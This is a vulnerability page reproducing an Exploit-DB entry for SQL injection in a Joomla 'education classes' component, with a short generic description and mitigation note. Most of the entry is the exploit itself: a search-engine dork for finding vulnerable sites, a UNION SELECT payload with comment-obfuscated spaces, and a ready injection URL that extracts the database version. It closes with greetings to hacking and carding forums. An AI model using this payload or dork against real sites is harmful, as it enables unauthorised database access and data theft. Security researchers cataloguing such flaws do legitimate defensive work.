Joomla Component Education SQL Injection Vulnerability

vendor:

N/A

by:

bumble_be

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP 2

N/A

Joomla Component Education SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The attacker can use the UNION operator to append the results of a query to the vulnerable application's own query and extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: joomla component education SQL injection Vulnerability
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2

======================================================================
[x] author : bumble_be (iogi89@ymail.com)
[x] dork : inurl:option=com_education_classes
[x] myweb : http://linggau-haxor.com
======================================================================

==== SQLI EXPLOIT ====
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--



==== VULN IN HERE ====

http://localhost/xampp/joomla/index.php?option=com_education_classess&task=showEvents&id=11[c0de]



==== LIVE DEMO ====

http://localhost/xampp/joomla/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

[x]-------------------------------------------------------------------

GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID

[x]-------------------------------------------------------------------

MY BROTHA :
mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker

[x]-------------------------------------------------------------------

note :mulailah sesuatu dengan ucapan bissmillah

[X]-------------------------------------------------------------------